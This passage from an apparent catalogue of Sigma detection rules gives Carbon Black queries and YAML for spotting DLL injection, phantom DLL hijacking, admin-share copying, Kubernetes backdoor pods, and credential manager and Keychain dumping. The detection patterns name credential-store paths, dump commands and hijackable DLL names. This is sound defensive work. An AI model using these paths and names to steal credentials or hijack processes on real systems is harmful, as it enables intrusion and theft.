            - ' -c '
            - ' -r '
            - ' -k '
        Image|endswith: '\chcp.com'
        CommandLine|endswith:
            - 'chcp'
            - 'chcp '
            - 'chcp  '
    condition: selection
falsepositives:
    - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
    - Discord was seen using chcp to look up code pages
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml

Convert to SIEM query

medium Moderate High FP

ConvertTo-SecureString Cmdlet Usage Via CommandLine

Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity

status test author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton ATT&CK sub-technique id 74403157-20f5-415d-89a7-c505779585cf

carbon_black query

((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) CommandLine:ConvertTo\-SecureString*

view Sigma YAML

title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
id: 74403157-20f5-415d-89a7-c505779585cf
status: test
description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples
author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
date: 2020-10-11
modified: 2023-02-01
tags:
    - attack.stealth
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains: 'ConvertTo-SecureString'
    condition: all of selection_*
falsepositives:
    - Legitimate use to pass password to different powershell commands
level: medium

Convert to SIEM query

medium Strong Medium FP

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an Admin share or remote

status test author Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali ATT&CK sub-technique id 855bc8b5-2ae8-402e-a9ed-b889e6df1900

carbon_black query

(CommandLine:\\\\*\\*$* OR CommandLine:\\Sysvol\\*) (((Image:\\robocopy.exe OR Image:\\xcopy.exe) OR (OriginalFileName:robocopy.exe OR OriginalFileName:XCOPY.EXE)) OR ((Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) CommandLine:copy*) OR (((Image:\\powershell_ise.exe* OR Image:\\powershell.exe* OR Image:\\pwsh.exe*) OR (OriginalFileName:powershell_ise.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:copy\-item* OR CommandLine:copy\ * OR CommandLine:cpi\ * OR CommandLine:\ cp\ * OR CommandLine:move\ * OR CommandLine:\ move\-item* OR CommandLine:\ mi\ * OR CommandLine:\ mv\ *)))

view Sigma YAML

title: Copy From Or To Admin Share Or Sysvol Folder
id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900
status: test
description: Detects a copy command or a copy utility execution to or from an Admin share or remote
references:
    - https://twitter.com/SBousseaden/status/1211636381086339073
    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
    - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
date: 2019-12-30
modified: 2025-10-22
tags:
    - attack.lateral-movement
    - attack.collection
    - attack.exfiltration
    - attack.t1039
    - attack.t1048
    - attack.t1021.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_target:
        CommandLine|contains:
            - '\\\\*\\*$' # example \\SVR_NAME\ADMIN$
            - '\Sysvol\'
    selection_other_tools:
        - Image|endswith:
              - '\robocopy.exe'
              - '\xcopy.exe'
        - OriginalFileName:
              - 'robocopy.exe'
              - 'XCOPY.EXE'
    selection_cmd_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cmd_cli:
        CommandLine|contains: 'copy'
    selection_pwsh_img:
        - Image|contains:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'powershell_ise.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_pwsh_cli:
        CommandLine|contains:
            - 'copy-item'
            - 'copy '
            - 'cpi '
            - ' cp '
            - 'move '
            - ' move-item'
            - ' mi '
            - ' mv '
    condition: selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)
falsepositives:
    - Administrative scripts
level: medium

Convert to SIEM query

medium Moderate Low FP

Crash Dump Created By Operating System

Detects "BugCheck" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.

status experimental author Jason Mull ATT&CK sub-technique id 882fbe50-d8d7-4e29-ae80-0648a8556866

carbon_black query

Provider_Name:Microsoft\-Windows\-WER\-SystemErrorReporting EventID:1001

view Sigma YAML

title: Crash Dump Created By Operating System
id: 882fbe50-d8d7-4e29-ae80-0648a8556866
related:
    - id: 2ff692c2-4594-41ec-8fcb-46587de769e0
      type: similar
status: experimental
description: Detects "BugCheck" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.
references:
    - https://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/
    - https://jasonmull.com/articles/offensive/2025-05-12-windows-crash-dumps-offensive-security/
author: Jason Mull
date: 2025-05-12
tags:
    - attack.credential-access
    - attack.collection
    - attack.t1003.002
    - attack.t1005
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Microsoft-Windows-WER-SystemErrorReporting'
        EventID: 1001
    condition: selection
level: medium

Convert to SIEM query

medium Moderate Medium FP

CrashControl CrashDump Disabled

Detects disabling the CrashDump per registry (as used by HermeticWiper)

status test author Tobias Michalski (Nextron Systems) ATT&CK technique id 2ff692c2-4594-41ec-8fcb-46587de769e0

carbon_black query

TargetObject:SYSTEM\\CurrentControlSet\\Control\\CrashControl* Details:DWORD\ \(0x00000000\)

view Sigma YAML

title: CrashControl CrashDump Disabled
id: 2ff692c2-4594-41ec-8fcb-46587de769e0
status: test
description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
references:
    - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
author: Tobias Michalski (Nextron Systems)
date: 2022-02-24
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.stealth
    - attack.defense-impairment
    - attack.t1564
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: 'SYSTEM\CurrentControlSet\Control\CrashControl'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Legitimate disabling of crashdumps
level: medium

Convert to SIEM query

medium Moderate Medium FP

CreateRemoteThread API and LoadLibrary

Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process

status test author Roberto Rodriguez @Cyb3rWard0g ATT&CK sub-technique id 052ec6f6-1adc-41e6-907a-f1c813478bee

carbon_black query

StartModule:\\kernel32.dll StartFunction:LoadLibraryA

view Sigma YAML

title: CreateRemoteThread API and LoadLibrary
id: 052ec6f6-1adc-41e6-907a-f1c813478bee
status: test
description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
references:
    - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-11
modified: 2024-01-22
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
    - detection.threat-hunting
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        StartModule|endswith: '\kernel32.dll'
        StartFunction: 'LoadLibraryA'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

status test author elhoim ATT&CK technique id 409f8a98-4496-4aaa-818a-c931c0a8b832

carbon_black query

Image:\\mobsync.exe (TargetFilename:.dll OR TargetFilename:.exe)

view Sigma YAML

title: Created Files by Microsoft Sync Center
id: 409f8a98-4496-4aaa-818a-c931c0a8b832
status: test
description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
references:
    - https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim
date: 2022-04-28
modified: 2022-06-02
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - attack.t1218
    - attack.execution
logsource:
    product: windows
    category: file_event
detection:
    selection_mobsync:
        Image|endswith: '\mobsync.exe'
    filter_created_file:
        TargetFilename|endswith:
            - '.dll'
            - '.exe'
    condition: selection_mobsync and filter_created_file
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Low FP

Creation Of An User Account

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

status test author Marie Euler, Pawel Mazur ATT&CK sub-technique id 759d0d51-bc99-4b5e-9add-8f5b2c8e7512

carbon_black query

(type:SYSCALL exe:\/useradd) OR type:ADD_USER

view Sigma YAML

title: Creation Of An User Account
id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512
status: test
description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
references:
    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files
    - https://access.redhat.com/articles/4409591#audit-record-types-2
    - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
author: Marie Euler, Pawel Mazur
date: 2020-05-18
modified: 2022-12-20
tags:
    - attack.t1136.001
    - attack.persistence
logsource:
    product: linux
    service: auditd
detection:
    selection_syscall_record_type:
        type: 'SYSCALL'
        exe|endswith: '/useradd'
    selection_add_user_record_type:
        type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos
    condition: 1 of selection_*
falsepositives:
    - Admin activity
level: medium

Convert to SIEM query

medium Moderate High FP

Creation Of Non-Existent System DLL

Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs. Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.

status test author Nasreddine Bencherchali (Nextron Systems), fornotes ATT&CK sub-technique id df6ecb8b-7822-4f4b-b412-08f524b4576c

carbon_black query

TargetFilename:\:\\Windows\\System32\\axeonoffhelper.dll OR TargetFilename:\:\\Windows\\System32\\cdpsgshims.dll OR TargetFilename:\:\\Windows\\System32\\oci.dll OR TargetFilename:\:\\Windows\\System32\\offdmpsvc.dll OR TargetFilename:\:\\Windows\\System32\\shellchromeapi.dll OR TargetFilename:\:\\Windows\\System32\\TSMSISrv.dll OR TargetFilename:\:\\Windows\\System32\\TSVIPSrv.dll OR TargetFilename:\:\\Windows\\System32\\wbem\\wbemcomn.dll OR TargetFilename:\:\\Windows\\System32\\WLBSCTRL.dll OR TargetFilename:\:\\Windows\\System32\\wow64log.dll OR TargetFilename:\:\\Windows\\System32\\WptsExtensions.dll OR TargetFilename:\\SprintCSP.dll

view Sigma YAML

title: Creation Of Non-Existent System DLL
id: df6ecb8b-7822-4f4b-b412-08f524b4576c
related:
    - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule
      type: similar
status: test
description: |
    Detects creation of specific system DLL files that are  usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.
    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.
    Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
references:
    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/
    - https://decoded.avast.io/martinchlumecky/png-steganography/
    - https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc
    - https://github.com/Wh04m1001/SysmonEoP
    - https://itm4n.github.io/cdpsvc-dll-hijacking/
    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/
    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/
    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/
    - https://x.com/0gtweet/status/1564131230941122561
author: Nasreddine Bencherchali (Nextron Systems), fornotes
date: 2022-12-01
modified: 2026-01-24
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - ':\Windows\System32\axeonoffhelper.dll'
            - ':\Windows\System32\cdpsgshims.dll'
            - ':\Windows\System32\oci.dll'
            - ':\Windows\System32\offdmpsvc.dll'
            - ':\Windows\System32\shellchromeapi.dll'
            - ':\Windows\System32\TSMSISrv.dll'
            - ':\Windows\System32\TSVIPSrv.dll'
            - ':\Windows\System32\wbem\wbemcomn.dll'
            - ':\Windows\System32\WLBSCTRL.dll'
            - ':\Windows\System32\wow64log.dll'
            - ':\Windows\System32\WptsExtensions.dll'
            - '\SprintCSP.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml

Convert to SIEM query

medium Moderate Low FP

Creation Of Pod In System Namespace

Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.

status test author Leo Tsaousis (@laripping) ATT&CK sub-technique id a80d927d-ac6e-443f-a867-e8d6e3897318

carbon_black query

verb:create "objectRef.resource":pods "objectRef.namespace":kube\-system

view Sigma YAML

title: Creation Of Pod In System Namespace
id: a80d927d-ac6e-443f-a867-e8d6e3897318
status: test
description: |
    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.
    System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.
    Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.
    Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
references:
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.stealth
    - attack.t1036.005
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'create'
        objectRef.resource: 'pods'
        objectRef.namespace: kube-system
    condition: selection
falsepositives:
    - System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace
level: medium

Convert to SIEM query

medium Strong Medium FP

Creation Of a Suspicious ADS File Outside a Browser Download

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

status test author frack113 ATT&CK tactic-only id 573df571-a223-43bc-846e-3f98da481eca

carbon_black query

(Contents:\[ZoneTransfer\]\ \ ZoneId=3* TargetFilename:\:Zone.Identifier (TargetFilename:.exe* OR TargetFilename:.scr* OR TargetFilename:.bat* OR TargetFilename:.cmd* OR TargetFilename:.docx* OR TargetFilename:.hta* OR TargetFilename:.jse* OR TargetFilename:.lnk* OR TargetFilename:.pptx* OR TargetFilename:.ps* OR TargetFilename:.reg* OR TargetFilename:.sct* OR TargetFilename:.vb* OR TargetFilename:.wsc* OR TargetFilename:.wsf* OR TargetFilename:.xlsx*)) (-(Image:\\brave.exe OR (Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR Image:\\maxthon.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\opera.exe OR Image:\\safari.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe OR Image:\\whale.exe OR (Image:C\:\\Program\ Files\\WindowsApps\\Microsoft.ScreenSketch_* Image:\\SnippingTool\\SnippingTool.exe TargetFilename:C\:\\Users\\* (TargetFilename:\\AppData\\Local\\Packages\\Microsoft.ScreenSketch_* TargetFilename:\\TempState\\Screenshot\ *) TargetFilename:.png\:Zone.Identifier)))

view Sigma YAML

title: Creation Of a Suspicious ADS File Outside a Browser Download
id: 573df571-a223-43bc-846e-3f98da481eca
status: test
description: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers
references:
    - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
author: frack113
date: 2022-10-22
modified: 2023-06-12
tags:
    - attack.stealth
logsource:
    product: windows
    category: create_stream_hash
detection:
    selection:
        Contents|startswith: '[ZoneTransfer]  ZoneId=3'
        TargetFilename|endswith: ':Zone.Identifier'
        TargetFilename|contains:
            - '.exe'
            - '.scr'
            - '.bat'
            - '.cmd'
            - '.docx'
            - '.hta'
            - '.jse'
            - '.lnk'
            - '.pptx'
            - '.ps'
            - '.reg'
            - '.sct'
            - '.vb'
            - '.wsc'
            - '.wsf'
            - '.xlsx'
    filter_optional_brave:
        Image|endswith: '\brave.exe'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_maxthon:
        Image|endswith: '\maxthon.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_opera:
        Image|endswith: '\opera.exe'
    filter_optional_safari:
        Image|endswith: '\safari.exe'
    filter_optional_seamonkey:
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|endswith: '\whale.exe'
    filter_optional_snipping_tool:
        Image|startswith: 'C:\Program Files\WindowsApps\Microsoft.ScreenSketch_'
        Image|endswith: '\SnippingTool\SnippingTool.exe'
        TargetFilename|startswith: 'C:\Users\'
        TargetFilename|contains|all:
            - '\AppData\Local\Packages\Microsoft.ScreenSketch_'
            - '\TempState\Screenshot '
        TargetFilename|endswith: '.png:Zone.Identifier'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Other legitimate browsers not currently included in the filter (please add them)
    - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)
level: medium

Convert to SIEM query

medium Moderate Medium FP

Creation of WerFault.exe/Wer.dll in Unusual Folder

Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

status test author frack113 ATT&CK sub-technique id 28a452f3-786c-4fd8-b8f2-bddbe9d616d1

carbon_black query

(TargetFilename:\\WerFault.exe OR TargetFilename:\\wer.dll) (-((TargetFilename:C\:\\Windows\\SoftwareDistribution\\* OR TargetFilename:C\:\\Windows\\System32\\* OR TargetFilename:C\:\\Windows\\SysWOW64\\* OR TargetFilename:C\:\\Windows\\WinSxS\\* OR TargetFilename:C\:\\Windows\\UUS\\*) OR Image:\\wuaucltcore.exe))

view Sigma YAML

title: Creation of WerFault.exe/Wer.dll in Unusual Folder
id: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1
status: test
description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
references:
    - https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/
author: frack113
date: 2022-05-09
modified: 2026-05-18
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\WerFault.exe'
            - '\wer.dll'
    filter_main_known_locations:
        TargetFilename|startswith:
            - 'C:\Windows\SoftwareDistribution\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
            - 'C:\Windows\UUS\' # covers both C:\Windows\UUS\arm64\ and C:\Windows\UUS\packages\
    filter_main_process:
        Image|endswith: '\wuaucltcore.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Creation of a Diagcab

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

status test author frack113 ATT&CK tactic-only id 3d0ed417-3d94-4963-a562-4a92c940656a

carbon_black query

TargetFilename:.diagcab

view Sigma YAML

title: Creation of a Diagcab
id: 3d0ed417-3d94-4963-a562-4a92c940656a
status: test
description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
references:
    - https://threadreaderapp.com/thread/1533879688141086720.html
author: frack113
date: 2022-06-08
tags:
    - attack.resource-development
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.diagcab'
    condition: selection
falsepositives:
    - Legitimate microsoft diagcab
level: medium

Convert to SIEM query

medium Strong Medium FP

CredUI.DLL Loaded By Uncommon Process

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id 9ae01559-cf7e-4f8e-8e14-4c290a1b4784

carbon_black query

((ImageLoaded:\\credui.dll OR ImageLoaded:\\wincredui.dll) OR (OriginalFileName:credui.dll OR OriginalFileName:wincredui.dll)) (-((Image:C\:\\Program\ Files\ \(x86\)\\* OR Image:C\:\\Program\ Files\\* OR Image:C\:\\Windows\\System32\\* OR Image:C\:\\Windows\\SysWOW64\\* OR Image:C\:\\Windows\\SystemApps\\*) OR (Image:C\:\\Windows\\explorer.exe OR Image:C\:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe OR Image:C\:\\Windows\\regedit.exe))) (-(Image:\\opera_autoupdate.exe OR (Image:\\procexp64.exe OR Image:\\procexp.exe) OR (Image:C\:\\Users\\* Image:\\AppData\\Local\\Microsoft\\Teams\\* Image:\\Teams.exe) OR (Image:C\:\\Users\\* Image:\\AppData\\Local\\Microsoft\\OneDrive\\*)))

view Sigma YAML

title: CredUI.DLL Loaded By Uncommon Process
id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784
status: test
description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
references:
    - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password
    - https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa
    - https://github.com/S12cybersecurity/RDPCredentialStealer
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2025-12-09
tags:
    - attack.credential-access
    - attack.collection
    - attack.t1056.002
logsource:
    category: image_load
    product: windows
detection:
    selection:
        - ImageLoaded|endswith:
              - '\credui.dll'
              - '\wincredui.dll'
        - OriginalFileName:
              - 'credui.dll'
              - 'wincredui.dll'
    filter_main_generic:
        Image|startswith:
            - 'C:\Program Files (x86)\'
            - 'C:\Program Files\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\SystemApps\'
    filter_main_full:
        Image:
            - 'C:\Windows\explorer.exe'
            - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
            - 'C:\Windows\regedit.exe' # This FP is triggered for example when choosing the "Connect Network Registry" from the menu
    filter_optional_opera:
        Image|endswith: '\opera_autoupdate.exe'
    filter_optional_process_explorer:
        Image|endswith:
            - '\procexp64.exe'
            - '\procexp.exe'
    filter_optional_teams:
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Microsoft\Teams\'
        Image|endswith: '\Teams.exe'
    filter_optional_onedrive:
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Microsoft\OneDrive\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Other legitimate processes loading those DLLs in your environment.
level: medium

Convert to SIEM query

medium Moderate High FP

Credential Manager Access By Uncommon Applications

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 407aecb1-e762-4acf-8c7b-d087bcff3bb6

carbon_black query

(FileName:\\AppData\\Local\\Microsoft\\Credentials\\* OR FileName:\\AppData\\Roaming\\Microsoft\\Credentials\\* OR FileName:\\AppData\\Local\\Microsoft\\Vault\\* OR FileName:\\ProgramData\\Microsoft\\Vault\\*) (-(Image:C\:\\Program\ Files\\* OR Image:C\:\\Program\ Files\ \(x86\)\\* OR Image:C\:\\Windows\\system32\\* OR Image:C\:\\Windows\\SysWOW64\\*))

view Sigma YAML

title: Credential Manager Access By Uncommon Applications
id: 407aecb1-e762-4acf-8c7b-d087bcff3bb6
status: test
description: |
    Detects suspicious processes based on name and location that access the windows credential manager and vault.
    Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
references:
    - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-11
modified: 2024-07-29
tags:
    - attack.t1003
    - attack.credential-access
logsource:
    category: file_access
    product: windows
    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'
detection:
    selection:
        FileName|contains:
            - '\AppData\Local\Microsoft\Credentials\'
            - '\AppData\Roaming\Microsoft\Credentials\'
            - '\AppData\Local\Microsoft\Vault\'
            - '\ProgramData\Microsoft\Vault\'
    filter_system_folders:
        Image|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
            - 'C:\Windows\system32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_*
falsepositives:
    - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
# Increase level after false positives filters are good enough
level: medium

Convert to SIEM query

medium Strong Medium FP

Credentials from Password Stores - Keychain

Detects passwords dumps from Keychain

status test author Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) ATT&CK sub-technique id b120b587-a4c2-4b94-875d-99c9807d6955

carbon_black query

(Image:\/usr\/bin\/security (CommandLine:find\-certificate* OR CommandLine:\ export\ *)) OR (CommandLine:\ dump\-keychain\ * OR CommandLine:\ login\-keychain\ *)

view Sigma YAML

title: Credentials from Password Stores - Keychain
id: b120b587-a4c2-4b94-875d-99c9807d6955
status: test
description: Detects passwords dumps from Keychain
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md
    - https://gist.github.com/Capybara/6228955
author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
date: 2020-10-19
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1555.001
logsource:
    category: process_creation
    product: macos
detection:
